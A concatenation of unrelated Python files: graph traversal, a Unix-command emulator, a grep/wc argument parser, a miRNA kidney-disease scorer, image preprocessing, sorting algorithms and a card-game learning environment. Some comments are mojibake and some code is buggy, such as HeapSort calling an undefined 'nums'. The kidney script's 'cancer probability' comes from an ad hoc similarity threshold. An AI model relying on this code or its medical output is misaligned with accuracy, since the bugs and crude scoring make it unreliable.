{1: {2}, 2: {3, 4}, 3: {5}, 4: {6, 7}, 5: {3}, 6: {3}, 7: {1, 6}}
'''
print(graph.vertices)
'''
Valid BFT paths:
1, 2, 3, 4, 5, 6, 7
1, 2, 3, 4, 5, 7, 6
1, 2, 3, 4, 6, 7, 5
1, 2, 3, 4, 6, 5, 7
1, 2, 3, 4, 7, 6, 5
1, 2, 3, 4, 7, 5, 6
1, 2, 4, 3, 5, 6, 7
1, 2, 4, 3, 5, 7, 6
1, 2, 4, 3, 6, 7, 5
1, 2, 4, 3, 6, 5, 7
1, 2, 4, 3, 7, 6, 5
1, 2, 4, 3, 7, 5, 6
'''
graph.bft(1)
'''
Valid DFT paths:
1, 2, 3, 5, 4, 6, 7
1, 2, 3, 5, 4, 7, 6
1, 2, 4, 7, 6, 3, 5
1, 2, 4, 6, 3, 5, 7
'''
graph.dft(1)
seen,stack = graph.dft_recursive(1)
print(stack)
'''
Valid BFS path:
[1, 2, 4, 6]
'''
print(graph.bfs(1, 6))
'''
Valid DFS paths:
[1, 2, 4, 6]
[1, 2, 4, 7, 6]
'''
print(graph.dfs(1, 6))
print('DFS recursive:',graph.dfs_recursive(1, 6))
print(list(graph.get_neighbors(1)))
|
import os
import subprocess
class UnixCmd(object):
def __cd__(self, path):
self.redirect_stdout('cd', path)
def __ls__(self):
self.redirect_stdout('dir', os.getcwd())
def __cat__(self, fname):
self.redirect_stdout('type', fname)
def __cp__(self, fname, path):
self.redirect_stdout('copy', fname, path)
def __mv__(self, org_name, new_name):
self.redirect_stdout('ren', org_name, new_name)
def __rm__(self, fname):
self.redirect_stdout('del', fname)
def __more__(self, fname):
self.redirect_stdout('more', fname)
@staticmethod
def redirect_stdout(cmd, *path):
line = 0
fp = subprocess.Popen([cmd, path], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, shell=True)
for eachline in fp.stdout:
line += 1
print(eachline)
print(str(eachline).strip('\r\n'))
if line >= 32:
input('-more-')
def shell():
cmd = UnixCmd()
sh_cmd = {'cd': cmd.__cd__, 'ls': cmd.__ls__, 'cat': cmd.__cat__,
'cp': cmd.__cp__, 'mv': cmd.__mv__, 'rm': cmd.__rm__,
'more': cmd.__more__}
while True:
msg = input('[%s:]$' % os.name).strip()
sh = msg.split(' ')
if sh[0] not in sh_cmd.keys():
print('Invalid command.')
continue
if msg == 'ls':
sh_cmd[msg]()
continue
if len(sh) < 2:
sh.append('')
if sh[0] in ['cd', 'cat', 'rm', 'more']:
sh_cmd[sh[0]](sh[1])
continue
if len(sh) < 3:
sh.append('')
if sh[0] in ['mv', 'cp']:
sh_cmd[sh[0]](sh[1], sh[2])
if sh[0] == 'exit':
break
shell() |
import DocumentProcessorBuilder
def parseCMDArgs(listOfCMDArgs):
def parse_commands(listOfCMDArgs):
second_command = None;
if len(listOfCMDArgs) > 5 :
second_command = listOfCMDArgs[5]
elif len(listOfCMDArgs) < 3:
raise RuntimeError("too few arguments")
def fillObjectsToReturn (first_command, second_command):
return_object = DocumentProcessorBuilder.DocumentProcessorBuilder()
if first_command == "grep":
return_object.set_line_filterer()
if first_command == "wc" or second_command == "wc":
return_object.set_case_converter()
return_object.set_word_finder()
return_object.set_non_abc_filterer()
return_object.set_word_counter()
return return_object
return fillObjectsToReturn(listOfCMDArgs[1], second_command)
def parse_arguments(listOfCMDArgs, dpb):
file_name = listOfCMDArgs[2]
if hasattr(dpb, 'line_filterer'):
file_name = listOfCMDArgs[3]
words_to_search_for = listOfCMDArgs[2]
return {'file_name': file_name, 'words_to_search_for': words_to_search_for, 'dpb': dpb}
dictionary_to_return = {'file_name': file_name, 'dpb':dpb}
return dictionary_to_return
dpb = parse_commands(listOfCMDArgs)
return parse_arguments(listOfCMDArgs, dpb)
|
#Predicts likehood of someone having kidney disease based on their mirna
#Predition is based of comparsion of known mirna samples of people diagnosed with kidney disease
import numpy as np
import glob
from collections import OrderedDict
import parser
allMaxesPruned = parser.allMaxesPruned
maxPeople = parser.peopleCounter
maxScore = 0
topmiRNAHits = 50
patientMax = {}
isKidney = ""
similarityThreshold = 80
#Finds top 50 mirna for each person and places in map corresponding to likely possiblity of someone with kidney disease having that mirna based on standardized data
def createPatientDict(arr, result):
global patientMax, topmiRNAHits, allMaxesPruned, maxPeople
myArr = []
arr1 = np.copy(arr)
for x in xrange(1,topmiRNAHits):
tIndex = arr1.tolist().index(max(arr1))
arr1[tIndex] = 0
if allMaxesPruned.has_key(result[tIndex]):
patientMax[result[tIndex]] = allMaxesPruned[result[tIndex]] / maxPeople
else:
patientMax[result[tIndex]] = 0
#Score is calculated by adding up the likelihood or percentage of having a mirna that is included in both standardized data set and new patient data set
def createScore(prunedMap, people):
maxScore = 0.0
for each in prunedMap:
maxScore += prunedMap[each] / people
return maxScore
#Reads data from each test patient and creates dictionary including top 50 mirna based on ppm of mirna
#Map created with patient name and similarity score
def getPatientScore():
scoreMap = {}
global patientMax
for filename in glob.glob('testPerson/*.txt'):
patientMax = {}
ppm = None
result = None
f = open(filename)
f.readline() # skip the header
data = np.loadtxt(f, usecols=(1,2))
ppm = data[:, 0]
f.close()
f = open(filename)
f.readline()
lines = f.readlines()
result = []
for x in lines:
result.append(x.split('\t')[0])
createPatientDict(ppm, result)
patientScore = 0.0
for each in patientMax:
patientScore += patientMax[each]
scoreMap[filename] = patientScore
return scoreMap
#Creates table with patient id, similarity score to standardized data set, and likelihood of cancer
def likelyTable(patientScores):
print '{:<40}{:>45}{:>45}'.format("Patient ID", "Similarity Score", "Kidney Cancer Probability")
for each in patientScores:
global similarityThreshold
similarity = patientScores[each] / maxScore * 100.0
if similarity >= similarityThreshold:
isKidney = "Likely"
else:
isKidney = "Unlikely"
print '{:<40}{:>45}{:>45}'.format(each[11:], similarity, isKidney)
def main():
global allMaxesPruned, maxPeople, maxScore
patientScores = getPatientScore()
maxScore = createScore(allMaxesPruned, maxPeople)
likelyTable(patientScores)
main()
|
import plotly.plotly as py
import plotly.graph_objs as go
import pandas as pd
import numpy as np
df = pd.read_excel('/Users/bounouamustapha/Desktop/work/all_data.xlsx')
df.index = df['DATE_ARRIVEE']
del df['DATE_ARRIVEE']
def mean_absolute_error(y_true, y_pred):
y_true, y_pred = np.array(y_true), np.array(y_pred)
x = np.mean(np.abs(y_true - y_pred))
return x
def symetrique_mean_absolute_percentage_error(y_true, y_pred):
y_true, y_pred = np.array(y_true), np.array(y_pred)
x = np.mean(np.abs((y_true - y_pred) / (y_pred + y_true))) * 200
return x |
#
#
# Server Side Modules image manipulation
#
#
from __future__ import print_function
import os
import math
import logging
from sklearn.cross_validation import train_test_split
from sklearn.datasets import fetch_lfw_people
from sklearn.grid_search import GridSearchCV
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
from sklearn.decomposition import RandomizedPCA
from sklearn.svm import SVC
import numpy as np
from PIL import Image
def singleImage2nparray(imagePath,imageSize):
'''
Convert one image to nparray
'''
imageShape = (1, imageSize[0]*imageSize[1] )
i = Image.open(imagePath)
# Downsize
isub = i.resize(imageSize,Image.ANTIALIAS)
# Rotate image if from pi mounted to roof
if (os.path.basename(imagePath)[0:5]=='piPic'):
isub = isub.rotate(180)
# Make black and white
ii = isub.convert('L')
# Make 32-bit integer pixels
iii = ii.convert('I')
# Convert to ndarray
npiii = np.array(iii).flatten()
return np.reshape(npiii,imageShape)
def images2nparray(imageDir,imageSize,yFlag):
'''
Convert all images in directory to nparrays
'''
print(imageDir)
imageShape = (1, imageSize[0]*imageSize[1] )
# Get target dir contents and drop '.DS_Store'
contsAll = os.listdir(imageDir)
contsClean = [ c for c in contsAll if not (c.startswith('.'))]
print('Clean Contents '+str(contsClean))
X = np.empty((0,imageSize[0]*imageSize[1]))
y = np.empty((0,))
for i in contsClean:
print('Image: '+ str(i)+ ' is coded ' + str(yFlag) )
Xtmp = singleImage2nparray(imageDir+i,imageSize)
X = np.append(X, Xtmp ,axis=0)
y = np.append(y,yFlag)
return (X,y,contsClean)
def createTrainingSetByWindow(imagePath,
windowSize=(40,80),
overlap=(0.5,0.5),
cropBox=(80,40,160,200),
invertImage=False,
debug=False
):
'''
Move a window across an image, and create a set of cropped images
to be used as training set elements
'''
leftCornerHor = 0
leftCornerVer = 0
w = windowSize[0]
h = windowSize[1]
ovlapHor = overlap[0]
ovlapVer = overlap[1]
i = Image.open(imagePath)
# Downsize
## Rotate if pi mounted upside down
if invertImage:
i = i.rotate(180)
## Crop
isub = i.crop(cropBox)
imageWidth,imageHeight = isub.size
step = 1
y_pred = -1
# Scan window over rows first...
while (leftCornerVer+h <= imageHeight):
# Then columns
while (leftCornerHor+w <= imageWidth):
# print('Step '+str(step)+' '+str(leftCornerHor)+' '+str(leftCornerVer),' ',str(w),str(h))
step = step + 1
ic = isub.crop( (int(leftCornerHor),int(leftCornerVer),
int(leftCornerHor+w),
int(leftCornerVer+h)) )
# if y_pred == 1:
if debug:
ic.show()
ic.convert('RGB').save((imagePath+'_'+str(step)+'.jpg'))
# Move window
leftCornerHor += math.ceil(float(w)*(1.0-ovlapHor))
# After completing a row move down one row and repeat
leftCornerHor = 0.
leftCornerVer += math.ceil(float(h)*(1.0-ovlapVer))
return step
def writeDataSets(X,y,xFileName='X.csv',yFileName='y.csv',imageNameList=None,
nameFileName='Names.csv'):
# TODO: Use with syntax to avoid an open file in case of error.
xFile = open(xFileName,'w')
for i in X:
s = ''
for j in i:
s += str(j)+', '
xFile.write(s+'\n')
xFile.close()
yFile = open(yFileName,'w')
for i in y:
yFile.write(str(i)+'\n')
yFile.close()
# Optionally, write file with list of image file names
if (imageNameList<>None):
nameFile = open(nameFileName,'w')
for i in imageNameList:
nameFile.write(i+'\n')
nameFile.close()
return
if __name__ == "__main__":
# Dataset location and file structure
trainingDir = '/Users/andy/Documents/Software/imageProcessing/TrainingSet/'
testDir = '/Users/andy/Documents/Software/imageProcessing/TestSet/'
positiveSubDir = 'positive/'
negativeSubDir = 'negative/'
# Final image size fed to algorithm
# imageSize = (200,200)
imageSize = (40,80)
####################################
####################################
## Create training set
Xp,yp,imageNamesp = images2nparray(trainingDir+positiveSubDir,imageSize,1)
Xn,yn,imageNamesn = images2nparray(trainingDir+negativeSubDir,imageSize,-1)
X = np.append(Xp,Xn, axis=0)
y = np.append(yp,yn, axis=0)
fileNames = imageNamesp+imageNamesn
writeDataSets(X,y,imageNameList=fileNames)
print('Success, wrote X.csv, Y.csv, and Names.csv')
## Create test set
Xp_test,yp_test,imageNamesp_test = images2nparray(testDir+positiveSubDir,
imageSize,1)
Xn_test,yn_test,imageNamesn_test = images2nparray(testDir+negativeSubDir,
imageSize,-1)
print('Xp_test shape = '+str(Xp_test.shape))
X_test = np.append(Xp_test,Xn_test, axis=0)
y_test = np.append(yp_test,yn_test, axis=0)
fileNames_test = imageNamesp_test + imageNamesn_test
writeDataSets(X_test,y_test,'Xtest.csv','yTest.csv',
imageNameList=fileNames_test,nameFileName='NamesTest.csv')
|
# https://codility.com/programmers/task/missing_integer
def main():
print(solution([1,3,6,4,1,2])) # 5
print(solution([1])) # 2
def solution(A):
numbers = set(A)
length = len(A) + 1
for l in xrange(1,length):
if l not in numbers:
return l
return length
if __name__ == "__main__":
main() |
# Generated by Django 4.0.5 on 2022-08-01 19:46
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('accounts', '0017_level_created_livedata_created_player_created_and_more'),
]
operations = [
migrations.CreateModel(
name='Time',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('time', models.IntegerField()),
('position', models.IntegerField()),
('T1LW', models.CharField(blank=True, max_length=50)),
('T1C', models.CharField(blank=True, max_length=50)),
('T1RW', models.CharField(blank=True, max_length=50)),
('T1LD', models.CharField(blank=True, max_length=50)),
('T1RD', models.CharField(blank=True, max_length=50)),
('T1G', models.CharField(blank=True, max_length=50)),
('T2LW', models.CharField(blank=True, max_length=50)),
('T2C', models.CharField(blank=True, max_length=50)),
('T2RW', models.CharField(blank=True, max_length=50)),
('T2LD', models.CharField(blank=True, max_length=50)),
('T2RD', models.CharField(blank=True, max_length=50)),
('T2G', models.CharField(blank=True, max_length=50)),
('game', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='accounts.game')),
('lines', models.ManyToManyField(to='accounts.line')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
],
),
]
|
import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Variable
import math
import torch.nn.functional as F
import pdb
# Domain Confusion Loss
def Entropy(input_):
bs = input_.size(0)
epsilon = 1e-5
entropy = -input_ * torch.log(input_ + epsilon)
entropy = torch.sum(entropy, dim=1)
return entropy
def grl_hook(coeff):
def fun1(grad):
return -coeff*grad.clone()
return fun1
def CDAN(input_list, ad_net, entropy=None, coeff=None, random_layer=None):
softmax_output = input_list[1].detach()
feature = input_list[0]
if random_layer is None:
op_out = torch.bmm(softmax_output.unsqueeze(2), feature.unsqueeze(1))
ad_out = ad_net(op_out.view(-1, softmax_output.size(1) * feature.size(1)))
else:
random_out = random_layer.forward([feature, softmax_output])
ad_out = ad_net(random_out.view(-1, random_out.size(1)))
batch_size = softmax_output.size(0) // 2
dc_target = torch.from_numpy(np.array([[1]] * batch_size + [[0]] * batch_size)).float().cuda()
if entropy is not None:
entropy.register_hook(grl_hook(coeff))
entropy = 1.0+torch.exp(-entropy)
source_mask = torch.ones_like(entropy)
source_mask[feature.size(0)//2:] = 0
source_weight = entropy*source_mask
target_mask = torch.ones_like(entropy)
target_mask[0:feature.size(0)//2] = 0
target_weight = entropy*target_mask
weight = source_weight / torch.sum(source_weight).detach().item() + \
target_weight / torch.sum(target_weight).detach().item()
return torch.sum(weight.view(-1, 1) * nn.BCELoss(reduction='none')(ad_out, dc_target)) / torch.sum(weight).detach().item()
else:
return nn.BCELoss()(ad_out, dc_target)
def DANN(features, ad_net):
ad_out = ad_net(features)
batch_size = ad_out.size(0) // 2
dc_target = torch.from_numpy(np.array([[1]] * batch_size + [[0]] * batch_size)).float().cuda()
return nn.BCELoss()(ad_out, dc_target)
def RSL(source,target,k=1):
ns, nt = source.size(0), target.size(0)
d = source.size(1)
# Compute singular values of layers output
d, u,v = torch.svd(source)
r, l,s = torch.svd(target)
# Control sign of singular vectors in backprob.
d,v,r,s= torch.abs(d),torch.abs(v),torch.abs(r),torch.abs(s)
u_k = u[:-k]
#BSS with Spectral loss
u_n = torch.pow(u[-k:],2)
u_new = torch.cat([u_k,u_n])
# Compute Spectral loss
loss = torch.norm(u_new-l)
loss = loss / ns
return loss
def BSP(feature_s,feature_t):
_, s_s, _ = torch.svd(feature_s)
_, s_t, _ = torch.svd(feature_t)
sigma = torch.pow(s_s[0], 2) + torch.pow(s_t[0], 2)
return sigma
def compute_a_distance(method,input_list,ad_net,random_layer=None):
softmax_output = input_list[1].detach()
feature = input_list[0]
if "CDAN" in method:
if random_layer is None:
op_out = torch.bmm(softmax_output.unsqueeze(2), feature.unsqueeze(1))
ad_out = ad_net(op_out.view(-1, softmax_output.size(1) * feature.size(1)))
else:
random_out = random_layer.forward([feature, softmax_output])
ad_out = ad_net(random_out.view(-1, random_out.size(1)))
else:
ad_out = ad_net(feature)
batch_size = softmax_output.size(0) // 2
dc_target = torch.from_numpy(np.array([[1]] * batch_size + [[0]] * batch_size)).float().cuda()
predict = (ad_out >0.5).type(torch.int)
error = torch.sum((predict.float() != dc_target).type(torch.int)) / float(dc_target.size(0))
if error > .5:# https://github.com/jindongwang/transferlearning/blob/master/code/distance/proxy_a_distance.py
error = 1. - error
a_distance = 2*(1-2*error)
return a_distance
# log_str = "iter: {:05d}, evaluation_accuracy: {:.5f}, RSL: {:.5f}, domain_loss: {:.5f}, classifer_loss: {:.5f}".format(i, temp_acc,rsl_loss_value,transfer_loss_value,classifier_loss_value)
|
"""Advent of Code Day 20 - Particle Swarm"""
import re
import collections
def make_dict():
"""Make a dictionary out of the particle data."""
with open('input.txt') as f:
data = [line.strip() for line in f.readlines()]
particles = {}
for num, particle in enumerate(data):
p, v, a = re.findall(r'<(-?\d+),(-?\d+),(-?\d+)>', particle)
particles[num] = ((([int(x) for x in p])), ([int(x) for x in v]),
([int(x) for x in a]))
return particles
def find_closest():
"""Simulate particles until one of them is shown to remain closest to zero."""
closest = [10000,] # Dummy value so set == 1 parameter doesn't trigger
while True:
closest_dist = 1000000
temp_closest = None
for num, info in particle_dict.items():
for i in range(3):
info[1][i] += info[2][i]
info[0][i] += info[1][i]
from_zero = sum([abs(x) for x in info[0]])
if from_zero < closest_dist:
closest_dist = from_zero
temp_closest = num
closest.append(temp_closest)
if len(set(closest[-200:])) == 1:
break
return closest[-1]
def collisions():
"""Simulate the particles removing any that collide then return those left."""
tick = 0
while tick < 1000: # Large number so remaining particles should have diverged
position_count = collections.defaultdict(int,)
for __, info in particle_dict.items():
for i in range(3):
info[1][i] += info[2][i]
info[0][i] += info[1][i]
position_count[tuple(info[0])] += 1
to_del = []
for key, value in position_count.items():
if value > 1:
to_del.append(key)
collided = []
for position in to_del:
for key, values in particle_dict.items():
if tuple(values[0]) == position:
collided.append(key)
for num in collided:
del particle_dict[num]
tick += 1
return len(particle_dict)
if __name__ == '__main__':
particle_dict = make_dict()
# Answer One
print("The particle that will stay closest to 0,0,0:", find_closest())
particle_dict = make_dict()
# Answer Two
print("Number of particles that remain after collisions:", collisions())
|
class Solution:
def topKFrequent(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: List[int]
"""
# ๆฏไธชๆฐๅญๅบ็ฐ็ๆฌกๆฐ
frequency = {}
for num in nums:
if num not in frequency:
frequency[num] = 1
else:
frequency[num] += 1
# ๅบ็ฐๆฌกๆฐไธๆๆ็ๆฐๅญ
bucket = {}
for key, value in frequency.items():
if value not in bucket:
bucket[value] = [key]
else:
bucket[value].append(key)
top_k = []
for key in sorted(bucket.keys(), reverse=True):
for ele in bucket[key]:
if len(top_k) >= k:
return top_k
top_k.append(ele)
return top_k
if __name__ == '__main__':
nums = [1]
k = 1
res = Solution().topKFrequent(nums, k)
print(res)
|
# 10, 5, 7, 21, 4, 8, 18 ๋ก ๊ตฌ์ฑ๋๋ ๋ฆฌ์คํธ๋ฅผ ์์ฑํ์ฌ listnum์ ์ ์ฅํ๋ค.
listnum = [10, 5, 7, 21, 4, 8, 18]
# listnum์ ์ ์ฅ๋ ๊ฐ๋ค ์ค์์ ์ต์๊ฐ์ ์ถ์ถํ์ฌ ์ถ๋ ฅํ๋ค.
# ์ต์๊ฐ์ ๊ตฌํ๋ ๊ธฐ๋ฅ์ ํจ์๋ฅผ ์ฌ์ฉํ์ง ์๊ณ ์ ์ด๋ฌธ์ผ๋ก ์ง์ ๊ตฌํํ๋ค.
min_value = listnum[0]
for i in range(1, len(listnum)) :
if min_value > listnum[i] :
min_value = listnum[i]
print('์ต์๊ฐ :', min_value) |
#############
# Notes #
# Lesson 15 #
#############
def add_to_index(index,keyword,url):
for entry in index:
if entry[0] == keyword:
entry[1].append(url)
return
# not found, add a new keyword
index.append([keyword,[url]])
def lookup(index,keyword):
for entry in index:
if entry[0] == keyword:
return entry[1]
return []
def add_page_to_index(index,url,content):
words = content.split()
for word in words:
add_to_index(index,word,url)
'''
Latency - time it takes message to get from source to destination (usually measured in milliseconds 1000 milliseconds = 1 second)
Bandwidth - amount of information that can be transmitted per unit time (bits per second or million bits per second mbps)
What is a bit?
1 bit = smallest unit of information
As Brione points out, questions like this about how much information one bit conveys and what
are the best questions to ask to get the most information are the heart of Information Theory.
''' |
class BubbleSort(object):
def sort(self, num):
for i in range (len(num)):
for j in range (i+1,len(num)):
if num[i] > num[j]:
num[i], num[j] = num[j], num[i]
class SelectionSort(object):
def sort(self, num):
for i in range (len(num)):
minIndex = i
for j in range (i+1, len(num)):
if num[j] < num[minIndex]:
minIndex = j
num[i], num[minIndex] = num[minIndex], num[i]
class InsertionSort(object):
def sort(self, num):
for i in range(1, len(num)):
key = num[i]
j = i - 1
while (key < num[j] and j >= 0):
num[j+1] = num[j]
j -= 1
num[j+1] = key
class QuickSort(object):
def sort(self, num, front, end):
if front < end:
pivot = self.partition(num, front, end)
self.sort(num, front, pivot-1)
self.sort(num, pivot + 1, end)
def partition(self, num, front, end):
i = front - 1
pivot = num[end]
for j in range (front, end):
if num[j] < pivot:
i = i + 1
#swap
num[j], num[i] = num[i], num[j]
i = i + 1
#swap
num[i], num[end] = num[end], num[i]
return i
class MergeSort(object):
def sort(self, num, front, end):
if front < end:
mid = (front + end) // 2
self.sort(num, front, mid)
self.sort(num, mid + 1, end)
self.merge(num, front, mid, end)
def merge(self, num, front, mid, end):
leftList = num[front:mid+1]
rightList = num[mid+1:end+1]
leftList.append(float('inf'))
rightList.append(float('inf'))
leftIndex, rightIndex = 0, 0
for i in range (front, end+1):
if leftList[leftIndex] < rightList[rightIndex]:
num[i] = leftList[leftIndex]
leftIndex += 1
else:
num[i] = rightList[rightIndex]
rightIndex += 1
class HeapSort(object):
def sort(self, num):
self.buildHeap(num)
i = len(num)
while i > 1:
num[i-1], num[0] = num[0], num[i-1]
i -= 1
self.maxHeapify(num, 0, i)
def buildHeap(self, num):
i = len(num) // 2
while i >=0:
self.maxHeapify(num, i, len(num))
i -= 1
def maxHeapify(self, num, idx, length):
largest = idx
leftIdx = idx*2 + 1
rightIdx = idx*2 + 2
if leftIdx < length and num[leftIdx] > num[idx]:
largest = leftIdx
if rightIdx < length and num[rightIdx] > num[largest]:
largest = rightIdx
if largest != idx:
num[idx], num[largest] = num[largest], num[idx]
self.maxHeapify(nums, largest, length)
class RadixSort(object):
def sort(self, num, d):
length = len(num)
temp = [[0 for _ in range(length)] for _ in range(10)]
order = [0 for _ in range(10)]
k, n = 0, 1
while n <= d:
for i in range(length):
lsd = (num[i]//n) % 10
temp[lsd][order[lsd]] = num[i]
order[lsd] += 1
for i in range(10):
if order[i] != 0:
for j in range (order[i]):
num[k] = temp[i][j]
k += 1
order[i] = 0
k = 0
n *= 10
if __name__ == '__main__':
obj = BubbleSort()
nums = [4, 2, 6, 1]
obj.sort(nums)
assert (nums == [1, 2, 4, 6])
nums = [4, 24, 6, 1, 17, 3, 89, 43, 45]
obj.sort(nums)
assert (nums == [1, 3, 4, 6, 17, 24, 43, 45, 89])
q = QuickSort()
nums = [4, 2, 6, 1, 7, 3]
q.sort(nums, 0, 5)
assert (nums == [1, 2, 3, 4, 6, 7])
nums = [4, 24, 6, 1, 17, 3, 89, 43, 45]
q.sort(nums, 0, 8)
assert (nums == [1, 3, 4, 6, 17, 24, 43, 45, 89])
isort = InsertionSort()
nums = [4, 2, 6, 1, 7, 3]
isort.sort(nums)
assert (nums == [1, 2, 3, 4, 6, 7])
m = MergeSort()
nums = [4, 2, 6, 1, 7, 3]
m.sort(nums, 0, 5)
assert nums == [1, 2, 3, 4, 6, 7]
s = SelectionSort()
nums = [4, 2, 6, 1, 7, 3]
s.sort(nums)
assert nums == [1, 2, 3, 4, 6, 7]
h = HeapSort()
nums = [4, 2, 6, 1, 7, 3]
h.sort(nums)
assert nums == [1, 2, 3, 4, 6, 7]
r = RadixSort()
nums = [4, 2, 6, 1, 7, 3]
r.sort(nums, 1)
assert nums == [1, 2, 3, 4, 6, 7]
nums = [73, 22, 93, 43, 55, 14, 28, 65, 39, 81, 33, 100]
r.sort(nums, 100)
assert nums == [14, 22, 28, 33, 39, 43, 55, 65, 73, 81, 93, 100]
|
import numpy as np
from random import *
from multiprocessing import Process, Pipe
from names import *
import math
names = ['Mickael','Thierry','Georges','Antoine']
def format_state(state):
del state['HAS_HIDDEN']
del state['NBR_CARDS']
del state['BET']
new_state = []
for v in state.values():
try:
for x in v:
try: new_state.append(float(x))
except :
for y in x: new_state.append(float(y))
except: new_state.append(float(v))
state = np.asarray(new_state)
return state
class Card:
dic = {-1:'EMPY',0:'HIDDEN',1:'FLOWER',2:'SKULL'}
def __init__(self,value):
self.state = -1
self.value = value
def __str__(self, public = 1):
if public:
return Card.dic[self.state]
else:
return Card.dic[self.value]
actions = []
class Action:
def __init__(self,typ,value,index):
self.type = typ
self.value = value
self.index = index
actions.append(self)
def gen_actions():
index = 0
for x in range(2):
Action('CARD',x,index)
index += 1
for x in range(16):
Action('BET',x,index)
index += 1
Action('ABANDON',0,index)
index += 1
for x in range(3):
Action('SHOW',x,index)
index += 1
Action.gen_actions()
class Player:
index = 0
def reset(self):
self.pocket = [Card(1),Card(1),Card(1),Card(2)]
self.frontCards = []
self.points = 0
self.relative_order = 0
self.reward_pending = False
self.last_skull = 0
self.max_bet = 0
def __init__(self, name):
if Player.index > 3:
Player.index = 0
self.index = Player.index
Player.index += 1
self.name = name
def public_front(self):
front = []
for x in range(4):
try:
front.append(self.frontCards[x].state)
except:
front.append(0)
return front
def private_front(self):
front = []
for x in range(4):
try:
front.append(self.frontCards[x].value)
except:
front.append(0)
return front
def clear(self):
for card in self.frontCards:
self.pocket.append(card)
self.frontCards = []
self.refresh_stats()
def has_skull(self):
if 2 in [card.value for card in self.pocket]:return 1
else: return 0
def nbr_flowers(self):
return [card.value for card in self.pocket].count(1)
def play_flower(self):
for card in self.pocket:
if card.value == 1:
card.state = -1
self.frontCards.append(card)
self.pocket.remove(card)
return
def play_skull(self):
for card in self.pocket:
if card.value == 2:
card.state = -1
self.frontCards.append(card)
self.pocket.remove(card)
return
def show(self):
i = 1
while i <= len(self.frontCards):
card = self.frontCards[-i]
if card.state == -1:
card.state = card.value
return card.state
i+=1
return 0
def pocket_str(self):
s = ''
for card in self.pocket:
s += card.__str__(0) + ', '
return s
def front_str(self):
s = ''
for card in self.pocket:
s += str(card) + ', '
return s
def __str__(self):
pocket = """
id : {}
points: {}
pocket: {}
""".format(names[self.index], self.points, self.pocket_str())
return pocket
def skulled(self):
self.clear()
try:
self.pocket.remove(self.pocket[randrange(len(self.pocket))])
return 1
except:
return 0
def has_hidden_cards(self):
return -1 in [card for card in self.public_front()]
def has_cards(self):
return self.nbr_flowers() + self.has_skull() > 0
def win(self, reward_func):
self.reward(1, reward_func)
def lose(self, reward_func):
self.reward(-1, reward_func)
def play(self, state, legal_moves, forward_func,reward_func):
if self.reward_pending:
self.reward(0, reward_func)
if 'Human' not in self.name:
state = format_state(state)
if legal_moves.count(1) > 1:
legal_moves = np.array(legal_moves)
probas = forward_func(state, self.name)
probas *= legal_moves
#if not math.isnan(probas):
try:
index = list(probas).index(probas.max())
except:
print(probas)
print(legal_moves)
index = 0
else:
forward_func(state, self.name, 0)
index = legal_moves.index(1)
actions.sort(key = lambda c: c.index)
try: action = actions[index]
except:
print(actions, index, state, legal_moves)
raise IndexError
self.reward_pending = action
if action.type == 'BET' and action.value > self.max_bet: self.max_bet = action.value
elif action.type == 'CARD' and action.value == 0: self.last_skull = 0
return action
def refresh_stats(self):
self.max_bet = 0
self.last_skull += 1
def reward(self, amount, reward_func, action = None):
try:
if action == None: action = self.reward_pending.index
except:
print('ERROR')
print(self)
reward_func(amount, action, self.name)
self.reward_pending = False
def pocket_length(self):
return len(self.pocket)
class Env:
def __init__(self, players):
self.nbr_players = len(players)
self.players = [Player(player) for player in players]
self.alive_players = [player for player in self.players]
self.iters = 1000
self.next_player = None
self.order = []
def __str__(self, g = True):
players = ''
for player in self.players:
players += str(player)
return players
def relative_fronts(self,player):
fronts = [self.order[x].public_front() for x in player.relative_order]
return fronts
def relative_points(self,player):
return [self.order[x].points for x in player.relative_order]
def relative_in_game_players(self,player, in_game_players):
order = [self.order[x] for x in player.relative_order]
return [x in in_game_players for x in order]
def relative_hidden_cards(self, player):
return (1 * np.array([self.order[x].has_hidden_cards() for x in player.relative_order])).tolist()
def relative_bet_holder(self, player, bet_holder):
if bet_holder == None: return -1
if bet_holder in self.order[self.order.index(player):]:
return self.order.index(bet_holder) - self.order.index(player)
else:
return 5 - self.order.index(player) + self.order.index(bet_holder)
def relative_pockets(self, player):
return [self.order[x].pocket_length() for x in player.relative_order]
def relative_bets(self,player):
return [self.order[x].max_bet for x in player.relative_order]
def relative_last_skull(self,player):
return [self.order[x].last_skull for x in player.relative_order]
def state(self,player, bet, bet_holder,in_game_players):
return {'FLOWERS':player.nbr_flowers(), 'SKULL':player.has_skull(), 'FRONTS':self.relative_fronts(player),
'OWN_FRONT':player.private_front(), 'HAS_HIDDEN':self.relative_hidden_cards(player),
'ALIVE':self.relative_in_game_players(player,in_game_players),
'NBR_CARDS':self.nbr_cards(), 'BET':bet, 'POCKETS':self.relative_pockets(player),
'BET_HOLDER':self.relative_bet_holder(player, bet_holder), 'POINTS':self.relative_points(player),'LAST SKULLS': self.relative_last_skull(player), 'BETS':self.relative_bets(player)}
def order_players(self, start = 0, previous_player = 0):
if start:
self.order = []
order = list(range(len(self.players)))
shuffle(order)
for x in order:
new_player = self.players[x]
self.order.append(new_player)
for new_player in self.order:
l = list(range(self.nbr_players))
l_2 =l[self.order.index(new_player):] + l[:self.order.index(new_player)]
l_2.remove(self.order.index(new_player))
new_player.relative_order = l_2
previous_player = -1
next_player = previous_player + 1
if next_player == self.nbr_players: next_player = 0
order = self.order[next_player:] + self.order[:next_player]
return order
def reset_players(self):
for player in self.players:
player.reset()
def nbr_cards(self):
array = np.array([front for front in [player.public_front() for player in self.players]]).flatten()
return -array.sum()
def clear_players(self):
for player in self.players: player.clear()
def kill(self,player):
player.clear()
self.alive_players.remove(player)
def get_choice(self, player, bet, bet_holder, in_game_players):
state = self.state(player, bet, bet_holder, in_game_players)
legal_moves = self.get_legal_moves(player, state, in_game_players)
choice = player.play(state, legal_moves, self.forward, self.reward)
return choice
def card_stage(self):
bet = 0
bet_holder = None
in_game_players = [player for player in self.alive_players]
